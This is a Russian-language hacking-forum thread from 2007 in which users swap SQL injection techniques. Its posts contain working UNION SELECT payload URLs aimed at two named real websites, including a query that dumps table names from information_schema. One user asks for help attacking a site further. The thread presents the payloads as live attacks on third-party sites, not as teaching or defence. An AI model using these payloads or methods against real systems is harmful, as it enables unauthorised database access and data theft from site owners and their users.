вопрос по sql-inj
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
вопрос по sql-inj - 2007-08-14 12:36:52.023333
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
Что выводтся когда подбираеш правильное кол-во полей
|
|
|
|
|
RE: вопрос по sql-inj - 2007-08-14 13:21:55.030000
|
|
|
TABPO
Сообщений: 5
Оценки: 0
Присоединился: 2007-08-10 16:09:06.600000
|
Помоему выводится тоже самое что и при стандартной странице…
Пример
Вот страничка (если таие нельзя выкладывать, выложите подходящую)…
quote:
http://www.sat-tv.ru/?pageId=4&subId=-1
вот с правильным количеством полей
quote:
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,0
а вот с неправильным количеством
quote:
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9
Думаю я правильно написал… я же ведь еще нюб..
Да, цифра (в примере двоечка) обозначает поле в котором находимся и куда пихать запросы, или как оно там правильно называется
|
|
|
|
|
RE: вопрос по sql-inj - 2007-08-18 13:06:32.733333
|
|
|
Flisk
Сообщений: 1
Оценки: 0
Присоединился: 2007-08-18 12:58:51.480000
|
Здравствуйте!
Не мог бы кто-нить просмотреть и подсказать что можно дальше зделать, а то как не лезу не выходит! :(
http://megaspravka.ru/viewfirm.php?id=-413%20union%20all%20select%201,char(60,72,49,62,117,115,101,114,60,47,72,49,62),3,4,5,6,7,8,9,10,TABLE_NAME%20from%20information_SCHEMA.TABLES
|
|
|
|
|
|
